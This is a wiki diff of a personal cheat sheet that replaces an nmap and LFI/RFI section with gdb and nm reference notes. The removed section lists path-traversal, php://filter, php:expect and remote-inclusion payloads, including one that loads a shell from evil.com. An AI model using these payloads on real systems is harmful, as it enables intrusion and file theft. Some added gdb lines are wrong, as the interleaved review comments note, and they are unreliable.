Difference between revisions of "Cheat Sheet"

m (Gnu Debugger (gdb))
 
(8 intermediate revisions by the same user not shown)
Line 1: Line 1:
====== nmap ======
+
== Gnu Debugger (gdb)  ==
<syntaxhighlight>
+
<syntaxhighlight  lang=shell-session highlight="" line>
nmap -sP 192.168.56.0/24
+
 
nmap -O -sT -sV -p- -T5 192.168.56.101
+
## Running
 +
gdb <program>
 +
gdb --args
 +
gdb --pid
 +
 
 +
set args
 +
run
 +
kill
 +
 
 +
## Navigation
 +
info functions
 +
info variables
 +
info scope <function name>
 +
 
 +
## Debugging
 +
# Breakpoints
 +
break *_start
 +
delete breakpoint#
 +
clear # delete all
 +
enable/disable breakpoint#
 +
 
 +
# Watchpoints
 +
watch *_start
 +
delete/enable/disable watchpoint#
 +
 
 +
# Move around
 +
move
 +
m
 +
step
 +
s
 +
finish
 +
f
 +
continue
 +
c
 
</syntaxhighlight>
 
</syntaxhighlight>
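Review bot: In the added "# Move around" block, `move` and `m` are not gdb commands, and `f` is gdb's abbreviation for `frame`, not `finish`; use `next` / `n` and `finish` / `fin`. Under "# Breakpoints", the comment on `clear # delete all` is wrong: `clear` removes the breakpoints at a location, while `delete` with no argument removes all of them. In "## Running", `gdb --args`, `gdb --pid` and `set args` are listed without their operands, so add placeholders such as `<program> <arguments>` and `<pid>`.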
  
===== LFI / RFI =====
+
== nm / Name List ==
<syntaxhighlight>
+
<syntaxhighlight lang=shell-session highlight="" line>
http://example.com/index.php?page=../../../etc/passwd
+
## Symbol Types
http://example.com/index.php?page=../../../etc/passwd%00
+
A: Absolute Type
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
+
B: In the uninitialized data section (BSS)
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+
D: In the initialized data section
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+
N: Debugging Symbol
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+
T: In the text section
http://example.com/index.php?page=....//....//etc/passwd
+
U: Undefined symbol
http://example.com/index.php?page=..///////..////..//////etc/passwd
 
http://example.com/index.php?page=http://evil.com/shell.txt
 
http://example.com/index.php?page=http://evil.com/shell.txt%00
 
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 
http://example.com/index.php?page=php:expect://id
 
http://example.com/index.php?page=php:expect://ls
 
http://example.com/index.php?page=path/to/uploaded/file.png
 
 
</syntaxhighlight>
 
</syntaxhighlight>
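Review bot: The added "## Symbol Types" list gives six uppercase letters but does not say that nm prints a lowercase letter for a local symbol and an uppercase letter for a global one; add that line, and consider adding `R` (read-only data section) and `W` (weak symbol). This revision also removes the nmap and LFI / RFI blocks in full, which the edit summary "Gnu Debugger (gdb)" on a minor edit does not mention; either keep those sections or say so in the summary.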

Latest revision as of 14:55, 24 May 2018

Gnu Debugger (gdb)

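## Running
gdb <program>
gdb --args <program> <arguments>   # start the program with arguments
gdb --pid <pid>                    # attach to a running process

set args <arguments>
run
kill

## Navigation
info functions
info variables
info scope <function name>

## Debugging
# Breakpoints
break *_start
delete breakpoint#
delete            # with no argument: delete all breakpoints
clear <location>  # delete the breakpoints set at <location>
enable/disable breakpoint#

# Watchpoints
watch *_start
delete/enable/disable watchpoint#

# Move around
next      # step over function calls
n
step      # step into function calls
s
finish    # run until the current function returns
fin
continue
c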

nm / Name List

## Symbol Types
A: Absolute Type
B: In the uninitialized data section (BSS)
D: In the initialized data section
N: Debugging Symbol
T: In the text section
U: Undefined symbol